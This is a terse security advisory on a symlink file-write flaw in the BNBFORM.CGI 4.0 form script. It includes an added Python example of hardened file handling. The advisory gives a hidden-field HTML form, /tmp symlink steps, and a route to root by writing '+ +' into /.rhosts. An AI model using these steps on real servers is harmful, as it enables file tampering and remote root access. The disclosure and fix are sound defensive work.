suid@suid.kg - mini advisory - BNBFORM.CGI

Software:   BNBFORM.CGI
Vendor:     BigNoseBird.com
URL:        http://bignosebird.com/carchive/bnbform.shtml
Version:    4.0
Platforms:  Unix, Windows NT
Type:       Input validation problem

Summary:

	Any local user can create, append to, or truncate any file owned
	by the web server user (nobody/apache/whatever).

Vulnerability:

	Build an HTML form resembling:

		<form method=post action=/cgi-bin/bnbform.cgi>

		<input type=hidden name=blah value=blah>
		<input type=hidden name=required value=blah>
		<input type=hidden name=data_order value=blah>

		<!-- To truncate a file -->
		<input type=hidden name=countfile value="/tmp/whatever">
	
		<!-- To append to a file  -->
		<input type=hidden name=outputfile value="/tmp/whatever">

		<input type=submit>
		</form>

	In the /tmp directory, as a local user, create a symbolic link to
	the target file, named either /tmp/whatever.bcnt for the
	countfile/truncate version or /tmp/whatever.bout for the
	outputfile/append version (the script appends these suffixes to
	the supplied name before opening it).

	If httpd is running with UID == 0, you could potentially get root
	if the system honours /.rhosts: set the value of blah to "+ +\n"
	and symlink /tmp/whatever.bout -> /.rhosts. Example:

		<input type=hidden name=blah value="+ +
">

	Of course you could simply send this in a POST request directly
	to the web server. Whatever.
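	The scenario above replayed against hardened file handling, as an
	added example that is not the advisory's or BigNoseBird's code and
	is written in Python rather than the script's own language; the data
	directory and the .bcnt/.bout suffixes are assumptions modelled on
	the advisory:

```python
import os
import errno
import re
import tempfile

# Added, defensive example, not BNBFORM.CGI's own code. Two fixes for the bug the
# advisory describes: confine countfile/outputfile to a bare name inside one data
# directory (the directory and the .bcnt/.bout suffixes are assumptions modelled
# on the advisory), and open with O_NOFOLLOW so a symlink planted in /tmp is refused.

SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")

def resolve_form_file(param, base_dir, suffix):
    """Map a form-supplied name to <base_dir>/<name><suffix>; None if it is unsafe."""
    if not SAFE_NAME.fullmatch(param):  # rejects '/', '..', NUL and absolute paths
        return None
    return os.path.join(os.path.realpath(base_dir), param + suffix)

def open_no_follow(path, append):
    """Open for writing, failing instead of following a symlink at the last component."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_NOFOLLOW | (os.O_APPEND if append else os.O_TRUNC)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError as exc:
        if exc.errno in (errno.ELOOP, errno.EMLINK):  # Linux / BSD errors for "is a symlink"
            raise PermissionError("refusing to write through symlink: " + path)
        raise
    return os.fdopen(fd, "a" if append else "w")

def demo():
    """Replay the advisory's symlink scenario; returns (refused, victim_untouched, normal_ok)."""
    with tempfile.TemporaryDirectory() as data_dir:
        victim = os.path.join(data_dir, "victim.txt")  # stands in for /.rhosts
        with open(victim, "w") as f:
            f.write("original\n")
        os.symlink(victim, os.path.join(data_dir, "whatever.bout"))  # the planted link
        try:
            with open_no_follow(resolve_form_file("whatever", data_dir, ".bout"), True) as f:
                f.write("appended line\n")
            refused = False
        except PermissionError:
            refused = True
        with open(victim) as f:
            untouched = f.read() == "original\n"
        with open_no_follow(resolve_form_file("guestbook", data_dir, ".bout"), True) as f:
            f.write("hello\n")
        normal_ok = os.path.isfile(os.path.join(data_dir, "guestbook.bout"))
    return refused, untouched, normal_ok
```

	Note that O_NOFOLLOW only protects the final path component; the data
	directory itself must not be writable by untrusted local users.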

	Ok. Have a good one.	

http://www.suid.edu/advisories/004.txt

EOF